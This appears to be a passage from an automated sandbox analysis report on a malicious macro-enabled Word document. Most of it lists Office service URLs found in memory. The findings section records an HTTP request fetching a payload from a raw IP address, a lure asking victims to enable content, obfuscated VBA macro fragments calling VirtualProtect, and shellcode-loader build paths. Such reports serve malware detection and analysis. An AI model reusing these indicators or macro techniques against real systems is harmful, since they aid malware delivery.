Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com/
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/U
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules4
Source: WINWORD.EXE, 00000000.00000000.320827190.000000001253A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=winword.exe&Version=16.0.4954.1000&ClientI
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.comq
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.netFE
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.306010951.000000000D31E000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://officeapps.live.com
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com.0
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com:
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comN
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comary
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comc
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comd
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comp
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comument
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comx
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comy
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksCP
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officesetup.getmicrosoftkey.com%
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/rz
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities69sM
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: WINWORD.EXE, 00000000.00000000.325229073.000000000D281000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdateddll6
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: WINWORD.EXE, 00000000.00000000.325229073.000000000D281000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiest.dllL3L
Source: WINWORD.EXE, 00000000.00000000.325229073.000000000D281000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://onedrive.live.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/embed?i
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.comew
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.comz
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://osi.office.net
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://osi.office.net##
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://osi.office.netst
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://otelrules.azureedge.netnp#N
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://outlook.office.com
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://outlook.office.com/
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com2006
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.comBr
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://outlook.office365.com
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://outlook.office365.com/
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/.dll
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: WINWORD.EXE, 00000000.00000000.306836673.000000000D407000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pages.store.office.com/review/querydZ2ND
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json4
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://powerlift.acompli.net
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerlift.acompli.netPrqL
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectoryxT
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://roaming.edog.
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://settings.outlook.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://staging.cortana.ai
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.ai7
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.airlG
Source: WINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com3
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comP
Source: WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comW
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comXpyNZ
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.combs
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comrl
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile5QlO
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://tasks.office.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/c
Source: WINWORD.EXE, 00000000.00000000.322203445.000000000B154000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.htmll.dll
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://webshell.suite.office.com
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://wus2.contentsync.
Source: WINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Area
Source: AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.odwebp.svc.msom
Source: global trafficHTTP traffic detected: GET /fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.8.146.139Connection: Keep-Alive

System Summary

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4Screenshot OCR: Enable editing" button on W a the top bar, and then click "Enable content'. m" 8^- q . . ,. l!
Source: Screenshot number: 4Screenshot OCR: Enable content'. m" 8^- q . . ,. l!lll|| i i i "sm=m= O Type here to search Ki E a a g wg
Document contains an embedded VBA macro with suspicious strings
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Set = CallByName((EF9Yq0sar_("DgrVRLL_I")), EF9Yq0sar_("kMNkamqH7"), VbGet, EF9Yq0sar_("RQeWcJp24"))
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Set = CallByName((), EF9Yq0sar_("qWfCNVnD"), VbGet, )
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Set = CallByName((), EF9Yq0sar_("Qa6ipUt"), VbGet, )
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4160
Source: cnewton doc 08.11.2022.docOLE, VBA macro line: Private Sub Document_Open()
Source: cnewton doc 08.11.2022.docOLE indicator, VBA macros: true
Source: cnewton doc 08.11.2022.docVirustotal: Detection: 21%
Source: cnewton doc 08.11.2022.docReversingLabs: Detection: 15%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4160
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 4152
Source: cnewton doc 08.11.2022.doc.LNK.0.drLNK file: ..\..\..\..\..\Desktop\cnewton doc 08.11.2022.doc
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1220
Source: cnewton doc 08.11.2022.docOLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{DDE00C9B-9E2F-46A2-8526-4216C14B0389} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal80.expl.winDOC@3/11@0/1
Source: cnewton doc 08.11.2022.docOLE document summary: title field not present or empty
Source: cnewton doc 08.11.2022.docOLE document summary: author field not present or empty
Source: cnewton doc 08.11.2022.docOLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: cnewton doc 08.11.2022.docInitial sample: OLE zip file path = docProps/custom.xml
Source: cnewton doc 08.11.2022.docStatic file information: File size 2343230 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\RemoteDllLoader\Release-x32\RemoteDllLoader.pdb source: WINWORD.EXE, 00000000.00000000.348321457.000000001496F000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.337697577.0000000014BF0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\MemLoader\Release-x32\MemLoader.pdb source: WINWORD.EXE, 00000000.00000000.348321457.000000001496F000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.337697577.0000000014BF0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\RemoteDllLoader\Release-x32\RemoteDllLoader.pdb source: WINWORD.EXE, 00000000.00000000.348321457.000000001496F000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.337697577.0000000014BF0000.00000040.00000001.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
